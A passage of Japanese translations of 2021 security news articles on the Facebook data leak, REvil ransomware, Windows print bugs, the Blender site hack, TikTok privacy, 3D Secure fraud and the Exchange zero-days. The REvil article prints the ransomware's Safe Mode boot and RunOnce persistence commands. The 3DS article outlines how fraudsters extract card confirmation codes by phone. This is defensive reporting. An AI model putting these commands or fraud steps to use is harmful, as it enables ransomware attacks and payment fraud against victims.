     Alon Gal(サイバー犯罪インテリジェンス企業のCTO、Hudson Rock)によると、脅威のアクターは、2019年に現在はパッチされてているが、脅威のアクターがメンバーの電話番号にアクセスすることを可能にしていたFacebookの"Add Friend"機能を脆弱性攻撃したと信じられている。
     この主張されている脆弱性が、脅威のアクターにリークされたデータ中の全ての情報を取得することを可能にしたのか、あるいは、電話番号だけなのかは分かっていない。そして、これらの情報は公開されているプロファイルから収集された情報と結合された。
     当初のデータの販売($30,000と信じられている)の後、他の脅威のアクターは、プライベートTelegramボットを作成した。これは、他の脅威のアクターが金銭を支払うことでFacebookデータを介した検索を可能にするものである。

    Facebookデータ リークは無料でリリースされた

     本日、このFacebookデータ リークは、ハッカーフォーラムの貨幣形式である 8 site 'credits'(およそ$2.19)で同じハッカーフォーラムに実質無料でリリースされた(この部分は和訳を変更しています)。
     データ漏洩は、当初高価格で随意契約売買されていたが、これは、ハッカーコミュニティ内で評判を得るための方法として、それらが最終的に無料になるまで低価格化されて販売されることが通常である。
     「毎度のことであるが、それが無料でリークされるまで、より安価で販売し始める」と、GalはBleepingComputerとの会話の中で述べている。

    ハッカーフォーラムに無料で共有されたデータリーク(画像をクリックすると拡大表示されます)

     このデータリーク中には、Facebookの三人の共同設立者Mark Zuckerberg, Chris Hughes, Dustin Moskovitzの電話番号も含まれていた。このデータは、Facebookに最初に登録された4番目、5番目。6番目のメンバーである。

    データリーク中のFacebook設立者(画像をクリックすると拡大表示されます)

     このデータリークに関連する我々の質問に対応して、Facebookは、このデータは2019年に収穫されたものと同じデータであるとBleepingComputerに告げた。
     「これは以前、2019年に報道された古いデータである。我々は発見し、2019年8月にこの問題を修正した」とFacebookのスポークスマンはBleepingComputerに告げている。
     このデータは2019年のものかもしれないが、電話番号やeMailアドレスは長年に渡り同じままであるのが一般的であるので、これは脅威のアクターにとって価値のあるものである。
     脅威のアクターによって説明されているように、漏洩されたメンバーの地勢学上のTop20のリストは以下である。

    国名・地域 ユーザ数
    エジプト 44,823,547
    チュニジア 39,526,412
    イタリア 35,677,323
    アメリカ 32,315,282
    サウジアラビア 28,804,686
    フランス 19,848,559
    トルコ 19,638,821
    モロッコ 18,939,198
    コロンビア 17,957,908
    イラク 17,116,398
    アフリカ 14,323,766
    メキシコ 13,330,561
    マレーシア 11,675,894
    イギリス 11,522,328
    アルジェリア 11,505,898
    スペイン 10,894,206
    ロシア 9,996,405
    スーダン 9,464,772
    ナイジェリア 9,000,131
    ペルー 8,075,317

    データは攻撃を指揮するために使用される

     このリリースは、ハッカーフォーラムの他の脅威アクターに熱狂的に受け入れられている。これは、彼らがデータリークにリストされている人々に攻撃を仕掛けるために使用できるからである。
     例えば、脅威のアクターは、フィッシング攻撃に電子メールアドレスを、スミッシング(モバイルテキスト フィッシング)攻撃に携帯電話番号を使用することができる。
     脅威のアクターは、SIMスワップ攻撃(【訳注】SIMスワップ攻撃に関する詳細な情報は、Sophosのサイトを参照)を実行するために携帯電話番号と漏洩した情報を使用することで、SMSを介して送信される多段階認証コードを盗むことができる。
     全てのFacebookユーザーは、詳細情報を要求したり、メール内のリンクをクリックするように指示したりする奇妙な電子メールやテキストに注意することを勧める。
     BleepingComputerはデータリークついてFacebookに連絡したが、現時点では回答を受け取っていない。


    REvil身代金要求型マルウェア、「Windowsセーフモード」暗号化モードを搭載
    BleepingComputer : News>Security(2021/03/21)
     REvil身代金要求型マルウェアは、おそらくセキュリティソフトの検出を回避し、ファイルの暗号化の大きな成功をもたらすために、Windowsセーフモードでファイルを暗号化する機能を追加した。
     Windowsセーフモードは、ユーザが管理者特権で実行でき、オペレーティングシステム上のタスクを調査することを可能にする特別な起動モードである。このモードは、オペレーティングシステムが動作するために要求される最小のソフトウェアとドライバでロードされる。
     更に、Windowsにインストールされ自動的に起動するように設定されているあらゆるプログラムは、それらプログラムのautoun(自動起動)が、特定の方法で設定されている場合を除いて、セーフモードでは起動することはない。
     Windowsでautorunを作成する方法の一つは、レジストリで以下のようなエントリを作成することである。
      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
      HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
      HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce

     'RunOnce'キーは一度だけプログラムを起動し、次にレジストリからこのエントリを削除するが、'Run'キーは、ユーザがログインする度にプログラムを起動する。
     例えば、以下のレジストリキーは、ユーザがログインするとC:\Users\test\test.exeプログラムを自動的に起動する。

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "Startup"="C:\Users\test\test.exe"

     しかしながら、このオートランは、以下のようにバリュー名の冒頭にアスタリスク(*)を追加した場合を除き、セーフモードでは起動しない。

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "*Startup"="C:\Users\test\test.exe"

    REvilは現在「セーフモード」モードを搭載している

     MalwareHunterTeamによって発見されたREvilの新しいサンプルで、新しく追加された -smode コマンドライン引数は、デバイスを暗号化する前にセーフモードで再起動することをコンピュータに強制する。
     これを実行するために、REvilは、Windowsが再起動した時にSafe Mode with Networkingで強制的にコンピュータをブートするために以下のコマンドを実行する。

    bootcfg /raw /a /safeboot:network /id 1
    bcdedit /set {current} safeboot network

     次に、ユーザーがセーフモードでログインした後、'bcdedit / deletevalue {current} safeboot'を実行する'* franceisshit'と呼ばれる'RunOnce'オートランを作成する。

    削除されるRunOnceエントリ(画像をクリックすると拡大表示されます)

     最後に、この身代金要求型マルウェアは、ユーザが中断できないWindows再起動を強制的に実行する。
     このプロセスが終了する直前に、考えようによってはワクチン使用に関するフランスの最近の審議に関する可能性のある'AstraZeneca'(アストラゼネカ)と名付けられた追加のRunOnceを作成する。
     このautorunは、デバイスが再起動された後、次にユーザがログインした時に -smode 引数なしにREvil身代金要求型マルウェアを再起動する。

    AstraZenecaオートラン エントリ(画像をクリックすると拡大表示されます)

     これら二つの'RunOnce'エントリが、セーフモードでログインした後に実行され、次に自動的にWindowsによって削除されることを憶えておくことは重要である。
     再起動で、このデバイスはSafe Mode With Networkingで起動する。そして、ユーザはWindowsにログインすることを促される。一旦ログインすると、REvil身代金要求型マルウェアは、-smode 引数なしに実行され、そのデバイス上のファイルの暗号化を開始する。
     Windowsはまた、この身代金要求型マルウェアが終了した時に、通常モードでこのマシンを再起動するように'*AstraZeneca'レジストリキーによって設定された 'bcdedit /deletevalue {current} safeboot'を実行する。
     REvilがファイルを暗号化している間、セーフモード画面はブランクになるが、Windowsタスクマネージャを起動するためのCtrl+Alt+Deleteを使用することは依然として可能である。そこから、ユーザは、実行中の実行ファイルを確認できる。我々のテストにおいて、以下に示すように、これは'smode.exe,'と名付けられていた。

    セーフモードで実行中のREvil身代金要求型マルウェア(画像をクリックすると拡大表示されます)

     起動している間、この身代金要求型マルウェアは、このデバイスの暗号化を終了するまで、タスクマネージャからあらゆるプログラムを起動することを妨げる。
     このデバイスが暗号化されると、残りのブートアップシーケンスを実行できるようになり、このデスクトップには、脅迫文が表示され、ファイルは暗号化されている。

    セーフモードで暗号化されたデバイス(画像をクリックすると拡大表示されます)

    異常なアプローチ

     REvilの新しいセーフモード オペレーションは、セーフモードで再起動した後、ユーザがこのデバイスにログインすることを要求するので多少奇妙である。
     更に、ユーザがセーフモードにログインすると、ブランク画面が表示される。そして、この身代金要求型マルウェアがこのデバイスを暗号化する時、デバイスに大きなスラッシング(【訳注】 コンピュータが搭載するメインメモリの容量に対して実行中のプログラムが使おうとするメモリ容量が過大なため、メモリとストレージとの間で内容の入れ替え( ページング /スワッピング)が頻繁に起き、処理がなかなか進まない状態のこと(IT用語辞典より))が発生する。
     この挙動は、即座にユーザに疑念を発生させ、彼らのコンピュータを安全にするためにハイバーネートやシャットダウンを行うことになる。
     この理由から、攻撃者は、問題を発生させることなく暗号化したい特定のコンピュータ(仮想マシンやサーバのような)に対して新しいセーフモードコマンドを手動で実行することを可能にしている。
     この理由にも拘わらず、これは、身代金要求型マルウェアのギャングが、常に彼らの戦略を発展させていることなので、セキュリティ専門家やWindowsの管理者が監視しておく必要のある攻撃の新手法である。
     REvilはデバイスを暗号化するためにセーフモードを悪用する唯一のオペレーションではない。
     2019年に、'Snatch'として知られる別の身代金要求型マルウェアが、Windowsサービスを使用してセーフモードでデバイスを暗号化する機能を追加している。


    Microsoft: 3月のアップデートで発生する更なる印刷問題を警告
    BleepingComputer : News>Security(2021/03/18)
     Microsoftは、今月初旬にリリースしたWindows 10のアップデートをインストールした後、顧客は死のブルースクリーンの他に、更なる印刷問題が発生するかもしれないと発言している。
     Microsoftによると、これら最近のWindows 10アップデートは、幾つかのアプリケーションからの印刷時に、あるいは一部のプリンタへの印刷時に問題を発生する。これらの問題は、グラフィックの欠落や単色化、位置ズレや書式設定問題、ページやラベル印刷で空白印刷されるなどの問題が含まれる。
     「2021年03月09日もしくは03月15日にリリースされたアップデートをインストールした後、一部のアプリケーションから印刷した時、ユーザは予期しない結果を得るかもしれない」と、このアップデートに関してWindows 10 Health Dashboardで発言している。
     Microsoftによって強調された印刷問題は、
      ・ バーコード、QRコード、ロゴのようなグラフィックスを含むドキュメントの要素が、白黒やカラーボックスで印刷される、あるいは欠落する可能性がある。
      ・ 表の枠線が欠落する。位置ズレや書式設定不良が発生する可能性がある。
      ・ 一部のアプリケーションからの印刷や一部のプリンタでの印刷は結果として空白のページやラベルとなる可能性がある

    影響を受けるプラットフォームと問題となっているアップデート

     影響を受けるプラットフォームは、Windows 7以降のWindowsバージョンの広汎な範囲のクライアント版とサーバ版が含まれる。
      ・ クライアント版: Windows 10, version 20H2; Windows 10, version 2004; Windows 10, version 1909; Windows 10, version 1809; Windows 10 Enterprise LTSC 2019; Windows 10, version 1803; Windows 10 Enterprise LTSC 2016; Windows 10, version 1607; Windows 10 Enterprise 2015 LTSB; Windows 8.1; Windows 7 SP1
      ・ サーバ版: Windows Server, version 20H2; Windows Server, version 2004; Windows Server, version 1909; Windows Server, version 1809; Windows Server 2019; Windows Server, version 1803; Windows Server 2016; Windows Server 2012 R2; Windows Server 2012; Windows Server 2008 R2 SP1; Windows Server 2008 SP2
     印刷時に問題を発生させる累積アップデートは、
      ・ Windows 10 2004/20H2 と Windows Server 2004/20H2用のKB5000802
      ・ Windows 10 1909 と Windows Server 1909用のKB5000808
      ・ Windows 10 1809 と Windows Server 2019用のKB5000822
      ・ Windows 10 1803 と Windows Server 1803用のKB5000809
     Microsoftは、これらの問題に関する修正を作業中であり、近日中に解決策が提供されるだろう。

    進行中のWindows印刷問題

     Windowsデバイス上で印刷に影響を与えるこれらの新しい問題は、印刷時に死のブルースクリーンを発生させるバグを修正した複数の定例外Windows 10累積アップデートのリリースと続いた。
     クラッシュ問題の修正を主張したにも関わらず、複数のBleepingComputerの読者は、依然としてMicrosoftが本日の更新で発言したブルースクリーン クラッシュと一部の問題を経験しているとレポートしていた
     Microsoftは、BleepingComputerが印刷中のシステムクラッシュに関する一連のユーザーからの苦情を報告した後、Windows 10のBSODクラッシュを引き起こす既知の問題を確認した
     OOB(定例外)更新プログラムを発行する前に、Microsoftは、一部の顧客があまりにも複雑とした手順を改良したこのクラッシュの一時的な修正も提供している。  


    BlenderのWebサイトはハックングを企てられた後メンテナンスモードに
    BleepingComputer : News>Security(2021/03/15)
     Blender.org(人気のある3Dコンピュータ グラフィックソフトウェアBlenderの公式Webサイト)は、サイトに表示されているメッセージによると現在メンテナンスモードになっている。
     「 http://blender.org Webサイトは、ハッキングを企てられたことによりメンテナンス下にある」と、本日早朝Twitter上のBlender公式アカウントは表明しており、更に「このWebサイトは可能な限り早急に復活するだろう」と追加している。
     「 Wiki, 開発者ポータル, git(【訳注】 分散型バージョン管理システム)リポジトリ, http://blender.chat等を含む殆どの基本的な機能は、通常通り利用可能である」とBlenderは追加している。
     Blenderによると、blender.orgのWebサイトの一部とブログの一部が依然としてダウンしたままであり、数時間オフラインのままになっている。
     このサイトのホームページは、通常通り稼働し続けているが、このサイトの他の部分では、"This page is not available"エラーを表示し、訪問者には"a copy on the Internet Archive."(インターネット・アーカイブのコピー)をチェックするよう訪問者に促している。

    Blender.orgのメンテナンスモード メッセージ(画像をクリックすると拡大表示されます)

     Blenderは、ダウンロードできる全てのファイルに関してchecksum(チェックサム)が検証され、ダウンロードしても安全であると考えていると発言している。
     また、download.blender.org/release/公式のダウンロードページ(再び利用可能になった後)に、Linux, Windows, macOS用の全てのリリースで利用可能なMD5やSHA256ハッシュを使用して、Blenderのサーバや他の全てのミラーからダウンロードできる全てのファイルのチェックサムをチェックすることができる。
     「http://blender.org Webサイト(そして、他のブログ)は、もう数時間オフラインのままだろう」と、「チェックサムは検証された、Blenderのダウンロードは安全であると考えられる」と、Blenderは追加している。
     cloud.blender.orgにホストされているBlenderトレーニングビデオにアクセスするためのBlender Cloud Webベースサービスは、この攻撃の影響を受けていない。このハッキングの試みは、このWebサイトの www サブドメインに影響を与えただけである。

     BlenderのTwitterへのリンク

     BleepingComputerは詳細に関してBlenderのスポークスマンに問い合わせているが、回答は戻ってきていない。
     これは現在進行中の問題である。


    Windows 10はMicrosoftの3月の定例パッチにより印刷している時にクラッシュする
    BleepingComputer : News>Security(2021/03/10)
     昨日リリースされたWindows 10の KB5000802とKB5000808累積アップデートは、ネットワークプリンタに印刷している時にBlue Screen of Death(死のブルースクリーン)を発生している。
     昨日、2021年3月の定例アップデートの一部として、Microsoftは、Windows 10 KB5000802とKB5000808累積アップデートをリリースした。
     それ以来、印刷している時、Windows 10で"APC_INDEX_MISMATCH for win32kfull.sys"死のブルースクリーンクラッシュが発生するという定常的な不平不満の流れがある。

    APC_INDEX_MISMATCH for win32kfull.sysの例(画像をクリックすると拡大表示されます)

     Reditでのシステム管理者の投稿[1,2]によると、昨日KB5000802とKB5000808のアップデートをインストールし、印刷しようとすると、Windows 10のクラッシュは即座に始まった。
     「ハイ、Jen。私自身を含めr/sysadminにいる何人かは、京セラKXドライバ タイプ3を使用してWindows Serverプリンタシェアに印刷ジョブを送信している時に、アップデート後(少なくともWin10 20H2以降)BSODを見ている(即ち、KXドライバ タイプ4や他の一般的なタイプ3/4ドライバは、この問題を提示しない)」と、あるRedditのユーザは投稿している。  「KB5000802は、私の或るクライアントのところの全ての京セラの印刷を切断した。昨年6月の印刷の問題と同じ形でのBSODである」と、他のユーザは確認している。通常の修正方法は何れも機能しないようだと述べている。
     影響を受けることが認識されているプリンタメーカーの一部には、京セラ、リコー、ダイモが含まれている。
     昨日これらのアップデートを受信した仮想マシンを使用して、BleepingComputerは、3月のプレビュー版のアップデートに戻したところ、最早昨日のようにKB5000802累積アップデートは提供されなかった。
     これは、Microsoftが問題を調査している間に、このアップデートをWindows Updateから引き抜いたことを示している。しかしながら、このアップデートは依然として、Microsoft Update カタログから入手可能である。
     更に、我々の一部のマシンは、2月24日にリリースされたKB4601382プレビュー版の累積アップデートを提供されているが、昨日のKB5000802は存在していない。これは、おそらくセキュリティアップデートがクラッシュを発生させている可能性を示している。

    新しいWindows 10 KB5000802 updateは提供されていない(画像をクリックすると拡大表示されます)

     昨日、Microsoftは、Windowsプリントスプーラの特権の昇格の脆弱性を修正する二つのセキュリティアップデート(CVE-2021-1640CVE-2021-26878として追跡される)をリリースした。
     Microsoftは、先月に提供したプレビュー版の累積アップデートにはセキュリティアップデートを含めていなかった。これが、おそらくプレビュー版のユーザが印刷時に同じクラッシュを経験をしなかった理由である。
     2020年6月の定例アップデートで、ユーザが印刷できないようにするバグもまた導入された。この印刷問題を解決するために、MicrosoftはWindowsユーザのために定例外アップデートをリリースした

    印刷時にwin32kfull.sysクラッシュを修正する方法

     残念ながら、プリンタドライバをアップデートすることでこの問題の修正を試したが、大概は不成功であった。
     代わりに、Windows 10ユーザは、KB5000802もしくはKB5000808アップデートを強制的にアンインストールすることで、印刷は再び正しく動作するようになる。
     印刷バグで影響を受けているのであれば、アプリケーションを終了させ、コマンドプロンプトを起動することでWindows 10 KB5000802累積アップデートをアンインストールすることができる。コマンドプロンプトで、以下のコマンドを入力しなさい。

    wusa /uninstall /kb:5000802

     Windows 10 KB5000808累積アップデートをアンインストールするには、以下のコマンドを代わりに使用する

    wusa /uninstall /kb:5000808

     アップデートをアンインストールする詳細なヘルプに関しては、このガイドを使用しなさい
     BleepingComputerはさらなる情報を求めてMicrosoftにコンタクトしたが、未だ回答はない。


    TikTocを使用しているか? 6つのセキュリティチップをチェックしよう
    Sophos : Naked Security(2021/03/04)
     TikTokは、中国企業ByteDanceが所有し、ユーザが3秒~1分の長さの範囲の短いビデオを作成・共有するビデオ-シェアリング サービスである。
     TikTokは、2005年のMySpace、2008年のFacebook、最近では2014年頃のInstagramとSnapchatに続いてソーシャルメディアの王座にある最新のアプリケーションである。
     否が応でも、TikTokの最近の人気を否定することはできない。TikTokの成功の大部分は、他の人気あるアプリケーションが今まで実行したことのない相互通信のより新しく、より一意の方法を提供しているためである。
     このアプリケーションは、2016年に稼働したが、2020年はTikTokが支配した年であった。これは、おそらく新型コロナウィルスのパンデミックに起因して、多くの人々が突然、馬鹿げたビデオを視聴し、それらを友人に送る、あるいは、馬鹿げたビデオの作成に参加したりするための多くの時間を持ったことを意味している。

    味方か敵か?

     世界的な人気にも関わらず、多くの人々と政府は、2020年6月にインド政府が、他の58の中国系電話アプリケーションと共にソーシャルメディアプラットフォームを締め出したこともあり、TikTokに関するサイバーセキュリティ上の懸念を持っている。
     セキュリティ上の懸念の大部分は、TikTokが中国企業であることに集中している。インド政府によると、中国の法律が、その国の企業は政府と情報を共有する必要があるとしているために、TikTokは安全保障上の脅威となった。
     このアプリケーションの人気は継続し、米国の10代の間で成長しているので、米国は、中国政府にこれまで以上に及ぶ範囲の巨大化の可能性を懸念して、2019年にTikTokの調査を発動した
     Wells Fargoを含む幾つかの米国企業は、企業所有のデバイスからTikTokアプリケーションを削除するように従業員に求めた。既に米軍は官給の電話からTikTokを締め出している。
     これらの懸念にも関わらず、TikTokが誰かから情報を「盗んだ」とする確たる証拠を共有した者はいない。
     そうは言っても、あなたが使用しているプラットフォームが何であれ(TikTok, Facebook, Twitter等)、常に、あなたが共有している全てのデータは、いつか公開されたり他の人々の手に渡る可能性があるということを疑うことから始めるのがベストである。
     TikTokを使用することを決めたのであれば(全てのソーシャルメディア プラットフォームで同じことがあてはまる)、あなたが何を共有しているのかに注意しなさい、そして、如何なる(【訳者補注】モバイル・アプリケーションの)固有セキュリティやプライバシーを想定しないようにしなさい。

    TikTokを安全にする6つのヒント

     TikTok上であなた自身の安全を守りたい、あるいは、子供や若い人々を保護したいかに拘わらず、TikTokを使用している時に、あなたのセキュリティとプライバシーを最大にするための支援となる幾つかのヒントを以下に示す。

    1. 必ずTikTokアカウントをPrivate(非公開)にする
     本質的にあなたのアカウントをPrivate(非公開)にすることは、誰かがフォローする前に、その人が承認される必要があることを意味している。これは、あなたのビデオや「いいね」に友人だけがアクセスできることを保証することになる。
     Settings > Privacy and Safety(設定 > プライバシー設定)に進み、見出しのDiscoverability(見つけやすさ)を探しなさい。
     この機能をアクティベートするには、Private Account(非公開アカウント)オプションをONにしなさい。

    2. 他の人があなたを見つけることを許可しない
     Defaultで、TikTokは、あなたが知らない人々の"For you"ページに、それを掲載することによってあなたのコンテンツを共有する。あなたが見知らぬ人にビデオを見られたくないのであれば、上図に示したSuggest your account to others(あなたのアカウントを他のユーザにおすすめ表示する)オプションをOFFにしなさい。
     この設定をOFFにすることで、あなたのアカウントは他のユーザに推奨されなくなり、他の人々が検索エンジンを介してあなたのアカウントを発見することができなくなる。

    3. 双方向通信を許可しない
     TikTokユーザは、複数の方法であなたのアカウントとコンテンツと双方向に通信することができる(それを閲覧したり、ダウンロードしたり、あなたに直接メッセージしたり、ビデオでデュエットしたり)。
     これら双方向通信のDefault設定はONである。しかし、あなたは、Friend(即ち、あなたのアカウントをフォローすることを許可した人々のみ、あなたのコンテンツと双方向通信することができる)やOFFに変更するオプションを持っている。
     他のユーザがあなたのビデオと相互通信することができる方法を制限するには、Privacy(プライバシー設定)ページのSafety(安全フィルター)セクションに進む。

     双方向通信をブロックすると、コメント、デュエット、リアクションを停止し、他の人があなたのメッセージや「いいね」したビデオの閲覧を妨げることになる。
     メッセージをブロックすることは、TikTokユーザがプライベートにチャットする方法(悪意ある誰かによって簡単に悪用される機能)なので特に重要である。

    4. 利用時間を管理する
     TikTokは中毒性の高いものであり、平均的ユーザは短いビデオのスクロールに1日52分費やしている。
     このアプリケーションの時間を制限したいのであれば、Settings & Privacy(プライバシー設定)のページのDigital Wellbeing(デジタルウェルビーイング)セクションに進む。時間制限するには Screen Time Management(使用時間制限モード)を使用する

     この制限を1日30分に設定したなら、この制限に到達すると1日の残りの時間はカットオフされる。
     設定している間に、将来子供がこの設定を変更することを妨げるパスコードを選択することが可能である。

    5. 子供達のアカウントにはRestricted Mode(制限モード)を使用する
     これは、TikTokを使用する子供を持つ親にとって最も重要な設定の一つである。
     制限モードは、子供に見せるにはふさわしくないコンテンツをストップする。100%正確ではないが、かなり良い仕事をする。
     子供が後にこの設定を変更することを防ぐためにパスコードを設定することも可能である。
     この設定はまた「利用時間を管理」セクションでも発見される。

    6. ファミリーセーフティーモードの利用
     これは、あなたが少年のアカウントを‘Parent’もしくは‘Teen’に割り当て、そのTikTokアカウントにアクセスできるようにすることを可能にする重要な設定である。
     そのアカウントに接続すると、あなたは以下のことを制御できる:

      ・ 利用時間管理: 子供が毎日どのくらいの時間TikTokに費やせるのかを設定する。
      ・ ダイレクトメッセージ: 子供に誰がメッセージできるのかを決定する。もしくは、ダイレクトメッセージを完全にOFFにする。
      ・ 制限モード: 子供に不適切と思うコンテンツのタイプを制限する。

     これら全てを自分のデバイスから管理できので、子供を常に保護することができる。
     この設定は、デジタルウェルビーイングのファミリーセーフモード セクションにある。


    ハッカーはペイメントカードの3Dセキュアをバイパスする方法を共有
    BleepingComputer : News>Security(2021/03/03)
     サイバー犯罪者は、オンラインカード取引認証に使用される3Dセキュア(3DS)プロトコルを回避する方法を常に模索し文書化している。
     地下フォーラムでの論議は、ソーシャル・エンジニアリングとフィッシング攻撃を結びつけることによって、最新のセキュリティ機能をバイパスする方法に関するアドバイスを提供している。
     複数のダークWebフォーラムの個人が、顧客の取引を保護するために実装されたショップで不正な購入を実行することに関する彼らの知識を共有している。
     3DSは、クレジットカードやデビットカードを使用するオンライン購入のためのセキュリティレイヤーを追加する。これは支払いを認証するためにカード所有者に直接確認を要求する。
     この機能は、銀行が取引を承認するためにコードや静的パスワードをユーザに要求した最初のバージョンから進歩している。スマホ向けに設計された二度目のバージョン(3DS 2)では、ユーザは、彼らの生体データ(指紋、顔認証)を使用するバンキング・アプリケーションで認証することによって購入を確認することができる。
     3DS 2が提供する高度なセキュリティ機能にも関わらず、最初のバージョンは、依然として広く採用されたままであり。彼らのソーシャル・エンジニアリングのスキルを使用するチャンスや、取引を承認するためのコードやパスワードを与えるようにユーザを欺くチャンスをサイバー犯罪者に与えている。

    ソーシャル・エンジニアリングは3DSコードを取得する

     本日のブログへの投稿で、脅威インテリジェンス企業Gemini Advisoryは、サイバー犯罪者が3DSを実装されたオンラインストアで偽の購入を実行することに関してダークWebフォーラムで議論している方法の一部を共有した。
     これは全て、少なくとも名前、電話番号、eMailアドレス、住所、母親の旧姓、ID番号、運転免許証番号を含むカード所有者の完全な情報で始まる。  同じ戦術は、最新の3DSで機能し、リアルタイムで購入することができる可能性がある。ハッカーは一流の地下フォーラムへの投稿でこの方法を説明している。

    (画像をクリックすると拡大表示されます)

     カード所有者の完全な詳細、ボイスチェンジャー、電話番号なりすましアプリを使用して、詐欺師はサイトで購入を開始し、次に犠牲者に電話して必要な情報を引き出す。

    「最終段階で、ハッカーは、最終的な本人確認用の確認コードを受け取るように犠牲者にアドバイスする。その時点で、サイバー犯罪者はその店に注文する必要がある。犠牲者の電話に送信された確認コードの入力を促されたなら、詐欺師は犠牲者からそのコードを取得する必要がある」Gemini Advisory。

     3DSコードを入手することは、フィッシングやインジェクションのような他の方法で可能である。犠牲者がフィッシングサイトで購入を実行すると、犯罪者は正当な店にその詳細全てを渡してその製品を取得する。
     Gemini Advisoryの発見によると、サイバー犯罪者の一部が、盗んだクレジットカードデータをPayPalアカウントに追加し、それを支払い方法として使用している。
     他の方法は古典的であり、セキュリティコードを傍受し、詐欺師にそれを渡すマルウェアで犠牲者の電話番号を侵害することを伴っている。
     あるいは多くの店舗では、取引が特定の制限を下回っている場合には3DSコードを要求しないため、詐欺師は複数の小規模な購入を持ち逃げすることができる。
     これらの手法の殆どは、以前のバージョンの3DSが存在している場合に機能する。3DS 2が広く採用されるまでには未だ長い道のりがある。ヨーロッパはより安全な標準(PSD2規制-3DS 2で満たされる強力な顧客認証)への移行を主導している一方、米国では3DS 1を使用する加盟店の不正責任保護は、2021年10月17日に期限切れになる。
     しかしながら、Gemini Advisoryは、サイバー犯罪者もソーシャルエンジニアリングを通じてより安全な3DS 2を攻撃するだろうと確信している。


    Microsoftは積極的に脆弱性攻撃されているExchangeの0-Dayのバグを今パッチした
    BleepingComputer : News>Security(2021/03/02)
     Microsoftは、標的型攻撃において積極的に脆弱性攻撃されている4つの0-Dayを修正したMicrosoft Exchangeの全てのバージョンをサポートする定例外のセキュリティ アップデートをリリースした。
     これら4つの0-Dayの脆弱性は、Microsoft Exchangeサーバへのアクセスを取得し、eMailを盗み、ネットワークへのアクセスを増加させるためのさらなるマルウェアを植え付けるものと結び付けられている。
     この攻撃が動作するには、リモート攻撃者は、オンプレミスのEicrosoft Exchangeサーバのポート443へのアクセスを必要とする。このアクセスが可能なら、脅威のアクターは、リモートアクセスを取得するために以下の脆弱性を活用する。
      CVE-2021-26855は、攻撃者が任意のHTTPリクエストを送信し、Exchangeサーバとして認証されることを可能にするExchange中のserver-side request forgery (SSRF、【訳注】SSRFの詳細に関してはCyber Security.comのこちらのページを参照してください)である。

      CVE-2021-26857は、Unified Messagingサービス(【訳注】電話、 FAX 、電子メールなど異なる通信手段のメッセージをデータ化して、 サーバー 上で 一元 管理すること(コトバンクより))中の逆デジタル化の危険な脆弱性である。危険な逆デジタル化は、信頼できないユーザ制御可能なデータがプログラムによって逆デジタル化されることである。この脆弱性を悪用することで、ExchangeサーバのSYSTEMとしてコードを実行する能力をHAFNIUM(【訳注】中国政府系ハッカーグループの名前)に与える。これは、管理者パーミッションもしくは、悪用可能な他の脆弱性を要求する。

      CVE-2021-26858は、Exchangeにおける認証後の任意のファイル書き込みの脆弱性である。HAFNIUMが、Exchangeサーバに認証されると、次に彼らは、サーバ上の任意のパスにファイルを書き込むためにこの脆弱性を使用する。彼らは、CVE-2021-26855 SSRF脆弱性を悪用することによって、あるいは、正当な管理者証明書を改竄することで認証されることができる。

      CVE-2021-27065は、Exchangeにおける認証後の任意のファイル書き込みの脆弱性である。HAFNIUMが、Exchangeサーバに認証されると、次に彼らは、サーバ上の任意のパスにファイルを書き込むためにこの脆弱性を使用する。彼らは、CVE-2021-26855 SSRF脆弱性を悪用することによって、あるいは、正当な管理者証明書を改竄することで認証されることができる。

     Microsoftは、データを盗むために米国組織に対してこれらの攻撃を悪用しているHAFNIUMとして知られる中国政府系ハッカーグループを検出した。
     「歴史的にHAFNIUMは、主に米国企業体を攻撃しており、感染症研究者、法律事務所、高等教育機関、防衛関連契約業者、政策シンクタンク、NGO法人を含む数多くの産業から情報を盗み出すことを目的にしている」と「HAFNIUMは中国に拠点を置いているが、主に米国でリースされた仮想プライベートサーバ(VPS)から作戦は指揮されている」と、Microsoft は本日のブログへの投稿で明らかにしている
     脆弱性のあるMicrosoft Exchangeサーバへのアクセスを取得すると、HAFNIUMは、Webシェルをインストールし、データ、アップロードファイル、セキュリティ侵害されたシステム上でほぼ全てのコマンドを実行することが可能になる。
     HAFNIUMは、Webシェルを使用してキャッシュされている証明書を収穫するためにLSASS.exe実行ファイルのメモリダンプを実行する。
     彼らは、Exchangeサーバからメールボックスと盗んだデータをエクスポートし、彼らが後に取得することのできるMEGAのようなファイルシェアリングサービスに、そのデータをアップロードする。
     最後にHAFNIUMは、そのマシンと内部ネットワークにアクセスするために彼らのサーバに戻るリモートシェルを作成する。
     この攻撃の申告性に起因して、Microsoftは、これらの攻撃からExchangeサーバを保護するために、管理者は「直ちにこれらのアップデートをインストールする」ように推奨している。
     Microsoftの上級脅威情報分析官Kevin Beaumontは、Nmap Scriptを作成した。このスクリプトは潜在的な脆弱性のあるMicrosoft Exchangeサーバのネットワークをスキャンする。
     このスクリプトを使用するには、彼のGitHubのページからNmap Scriptをダウンロードする。このファイルを/usr/share/nmap/scriptsに格納し、nmap --script http-vuln-exchange コマンドを使用する。

    Microsoft Exchangeサーバの潜在的な脆弱性を示すNmapスクリプト(画像をクリックすると拡大表示されます)

     Exchangeサーバが更新される必要があると決定したなら、サーバに現在サポートされている累積アップデートと更新プログラム・ロールアップがインストールされていることを確認する必要がある。
     管理者は、サポートされているアップデートに関する詳細情報と、パッチをインストールする方法に関しては本日公開されたMicrosfot Exchangeチームの記事中に見出すことができる。
     これらの脆弱性を使用してMicrosoft Exchangeサーバーがセキュリティ侵害されたか否かを検出するために、Microsoftは、攻撃の痕跡を確認するためにイベントログ/Exchange ServerのログをスキャンするPowerShellおよびコンソールコマンドを提供している


    MicrosoftはWindows 10ドライブ損壊のバグを修正 - 知る必要のあること
    BleepingComputer : News>Security(2021/02/27)
     Microsoftは、単に特定のパス、もしくは特別に細工されたファイルを閲覧することでNTFSボリュームが損壊することになるWindows 10のバグを修正した。
     先月、BleepingComputerは、低い特権のユーザを含むあらゆるユーザが、NTFSボリュームをダーティーとしてマークできる新たなWindowsのバグをレポートした。
